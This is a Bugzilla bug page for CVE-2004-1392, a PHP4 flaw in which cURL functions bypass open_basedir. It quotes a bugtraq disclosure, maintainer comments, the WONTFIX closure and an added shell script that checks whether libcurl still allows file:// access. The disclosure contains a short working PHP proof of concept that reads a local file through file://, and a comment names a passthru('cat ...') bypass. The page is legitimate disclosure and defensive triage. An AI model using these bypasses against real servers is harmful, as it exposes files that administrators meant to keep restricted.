Bugzilla – Bug 62911
VUL-0: CVE-2004-1392: php4 open_basedir bypass
Last modified: 2021-10-13 10:18:47 UTC
We received the following report via bugtraq. The issue is public. I can't judge whether this is really a problem. Is open_basedir meant to restrict php scripts to a specific directory or is it just the default current directory?

Date: Wed, 27 Oct 2004 18:26:23 +0200
From: FraMe <frame@hispalab.com>
To: bugtraq@securityfocus.com
Subject: PHP4 cURL functions bypass open_basedir

====================================================
Subject: PHP4 cURL functions bypass open_basedir
Author: frame at kernelpanik.org
Product: PHP4 compiled with cURL (not tested in PHP5)
Vendor: PHP/Zend
Vendor URL: www.php.net
Type: Local
Risk: Low/Medium
=====================================================

PHP cURL functions bypass open_basedir protection, so users can navigate through filesystem. For example, setting "open_basedir" in php.ini to "/var/www/html" anybody can retrieve "/etc/parla" using cURL functions.

== Proof of concept (curl.php)

<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch);
echo $file
?>

== Demo

$ cat /etc/parla
don't read please!
$ links -dump http://localhost/curltest/curl.php
don't read please!

== Release Timeline

No release timeline.
hello?
open_basedir is meant to restrict access to a specific directory. The recommendation from PHP developers: you need to configure/install curl not to allow access to the local filesystem. It has a nice configure option for that when you are installing it. IMHO this would be a nasty restriction for the curl library. Note that the open_basedir mechanism cannot restrict all access to open_basedir, like in passthru('cat /etc/parla').
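One way to check whether a libcurl build has been configured without local filesystem access, as the comment above recommends (libcurl's configure option for this is --disable-file). This is an added example, not part of the original bug report; the function names and both sample outputs are constructed for illustration.

```shell
#!/bin/sh
# Report whether a libcurl build still handles file:// URLs.
# Input: the text printed by `curl --version` or `curl-config --protocols`.

# has_file_protocol TEXT -> exit status 0 if "file" is a listed protocol.
has_file_protocol() {
    printf '%s\n' "$1" | awk '
        # `curl --version` style: "Protocols: dict file ftp ..."
        /^Protocols:/ { for (i = 2; i <= NF; i++) if (tolower($i) == "file") found = 1 }
        # `curl-config --protocols` style: one upper-case name per line
        NF == 1 && tolower($1) == "file" { found = 1 }
        END { exit found ? 0 : 1 }'
}

# verdict TEXT -> prints a one-line finding for the given build description.
verdict() {
    if has_file_protocol "$1"; then
        echo "FAIL: file:// enabled; curl_init(\"file:///...\") is not confined by open_basedir"
    else
        echo "OK: file:// disabled in this libcurl build"
    fi
}

# Constructed sample outputs (not captured from a real host).
SAMPLE_DEFAULT='curl 7.12.1 (i686-pc-linux-gnu) libcurl/7.12.1
Protocols: ftp gopher telnet dict ldap http file https
Features: SSL libz'
SAMPLE_HARDENED='curl 7.12.1 (i686-pc-linux-gnu) libcurl/7.12.1
Protocols: ftp gopher telnet dict ldap http https
Features: SSL libz'

verdict "$SAMPLE_DEFAULT"
verdict "$SAMPLE_HARDENED"
# On a live host: verdict "$(curl --version)"
```

PHP may be linked against a different libcurl than the command-line tool; the protocols list returned by PHP's curl_version() describes the library PHP actually uses.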
So this open_basedir is a useless feature anyways. I'll close as WONTFIX.
CAN-2004-1392
CVE-2004-1392: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)